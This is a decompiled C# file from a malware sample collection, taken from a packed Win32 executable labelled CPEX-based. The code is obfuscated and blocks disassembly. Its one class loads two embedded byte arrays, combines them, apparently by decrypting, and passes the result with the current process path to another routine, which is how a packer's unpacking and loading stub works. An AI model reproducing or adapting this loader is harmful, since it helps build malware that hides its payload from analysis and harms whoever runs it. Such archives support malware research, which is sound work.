MalwareSourceCode/MSIL/Packed/Win32/C/Packed.Win32.CPEX-based.ht-72f8bd90449e3c4875b681f4afb213e7bd866e6a0e1c08546770c7c21f92eed5/1.cs
2022-08-18 06:28:56 -05:00

44 lines
1.4 KiB
C#

// Decompiled with JetBrains decompiler
// Type: 1
// Assembly: syncui, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 8C369EE2-0F8E-40F6-BD9C-ED440A7013AE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Packed.Win32.CPEX-based.ht-72f8bd90449e3c4875b681f4afb213e7bd866e6a0e1c08546770c7c21f92eed5.exe
using System.Diagnostics;
using System.Runtime.CompilerServices;
[SuppressIldasm]
internal sealed class \u0031 : \u007C
{
public \u0031()
{
if (false)
;
// ISSUE: explicit constructor call
base.\u002Ector();
}
public override object \u0040(params object[] _param1)
{
if (false)
;
\u0026.\u0040 = (\u007C) new \u0030();
byte[] numArray1 = (byte[]) \u0026.\u0040.\u0040((object) 100);
byte[] numArray2 = (byte[]) \u0026.\u0040.\u0040((object) 101);
if (numArray1.Length <= 0 || numArray2.Length <= 0)
return (object) null;
\u0026.\u0040 = (\u007C) new \u002B();
byte[] numArray3 = (byte[]) \u0026.\u0040.\u0040((object) numArray2, (object) numArray1);
if (numArray3.Length <= 0)
return (object) null;
if (_param1.Length <= 0)
{
_param1 = new object[1];
_param1[0] = (object) new string[1];
}
\u0026.\u0040 = (\u007C) new \u005E();
\u0026.\u0040.\u0040((object) numArray3, (object) (string[]) _param1[0], (object) Process.GetCurrentProcess().MainModule.FileName);
return (object) null;
}
}